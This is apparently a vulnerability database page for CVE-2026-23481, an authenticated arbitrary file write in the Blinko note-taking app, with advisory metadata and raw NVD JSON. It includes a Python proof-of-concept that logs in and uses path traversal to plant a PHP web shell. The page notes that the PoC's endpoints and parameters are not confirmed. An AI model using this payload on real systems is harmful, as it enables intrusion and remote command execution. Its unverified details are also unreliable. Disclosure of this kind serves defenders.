Security Vulnerability Report
CVE-2026-23481 CVSS 6.5 MEDIUM

CVE-2026-23481

Published: 2026-03-23 21:17:02
Last Modified: 2026-03-24 18:50:04

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is an authenticated arbitrary file write vulnerability in saveAdditionalDevFile. This issue has been patched in version 1.8.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE
Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is provided for security research and authorized testing only; it is the published proof of concept as-is and its endpoints and parameter names are not confirmed by the advisory text above.
python
import requests # Exploit Title: Blinko Authenticated Arbitrary File Write # Date: 2026-03-23 # Exploit Author: Analyst # Vendor Homepage: https://github.com/blinkospace/blinko # Version: < 1.8.4 TARGET_URL = "http://target-ip" USERNAME = "attacker" PASSWORD = "password" session = requests.Session() # Step 1: Login to obtain authenticated session login_payload = { "username": USERNAME, "password": PASSWORD } login_resp = session.post(f"{TARGET_URL}/api/login", json=login_payload) if login_resp.status_code != 200: print("Login failed") exit() # Step 2: Trigger arbitrary file write via saveAdditionalDevFile # The endpoint allows specifying path and content exploit_payload = { "path": "../../var/www/html/shell.php", # Example path traversal "content": "<?php system($_GET['cmd']); ?>" } exploit_resp = session.post(f"{TARGET_URL}/api/saveAdditionalDevFile", json=exploit_payload) if exploit_resp.status_code == 200: print("[+] File written successfully!") print(f"[+] Check your webshell at: {TARGET_URL}/shell.php?cmd=whoami") else: print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23481", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:02.100", "lastModified": "2026-03-24T18:50:03.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is an authenticated arbitrary file write vulnerability in saveAdditionalDevFile. This issue has been patched in version 1.8.4."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, existe una vulnerabilidad de escritura arbitraria de archivos autenticada en saveAdditionalDevFile. Este problema ha sido parcheado en la versión 1.8.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.4", "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/commit/02a4205f1ad22d0e78dc2ab2967b551d0dbd0a06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-38hg-8p2j-76g5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}